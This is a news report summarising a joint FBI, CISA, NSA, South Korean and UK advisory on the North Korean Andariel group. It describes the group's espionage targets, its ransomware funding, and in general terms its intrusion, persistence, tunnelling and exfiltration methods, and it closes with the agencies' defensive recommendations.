Global security agencies issued a cybersecurity advisory on Thursday, highlighting cyber espionage activities linked to the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau, located in Pyongyang and Sinuiju. The bureau encompasses a state-sponsored cyber group known as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets defense, aerospace, nuclear, and engineering sectors to acquire sensitive, classified technical information and intellectual property. These activities are aimed at advancing the DPRK’s military and nuclear capabilities.
“The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation,” according to the advisory issued by the U.S. Federal Bureau of Investigation (FBI), Cyber National Mission Force (CNMF), Cybersecurity and Infrastructure Security Agency (CISA), Department of Defense Cyber Crime Center (DC3), National Security Agency (NSA) and Republic of Korea’s National Intelligence Service (NIS), Republic of Korea’s National Police Agency (NPA), and the U.K.’s National Cyber Security Centre (NCSC).
The advisory disclosed that the hackers then employed “standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential-stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration.”
Additionally, the agencies “believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities.”
The Andariel hackers also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.
The advisory identified that Andariel hackers fund their espionage activity through ransomware operations against U.S. healthcare entities, and in some instances, the agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same entity.
“The actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 (Log4Shell) in Apache’s Log4j software library and other CVEs listed above, to deploy web shells and gain access to sensitive information and applications for further exploitation,” the advisory noted. “The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously.”
The Andariel actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command-line (WMIC), and Linux bash for system, network, and account enumeration. They also often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach.
“The actors used customized file system enumeration tooling written in [dot]NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files,” according to the advisory. “The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes. The actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network.”
Additionally, the Andariel actors also use system logging for discovery to move laterally. “The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the ‘%Temp%’ directory. The actors have also used Remote Desktop Protocol (RDP) to move laterally.”
The advisory also found that Andariel hackers leverage techniques and infrastructure positioned around the world to send commands to compromised systems. “The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy,” it added.
Malware previously used by the Andariel actors permitted placement and access to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious tooling
Furthermore, the actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data. The Andariel actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols.
The authoring agencies encourage critical infrastructure organizations to promptly apply vulnerability patches, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While not exclusive, entities involved in or associated with defense, aerospace, nuclear, and engineering entities should remain vigilant in defending their networks from North Korean state-sponsored cyber operations.
link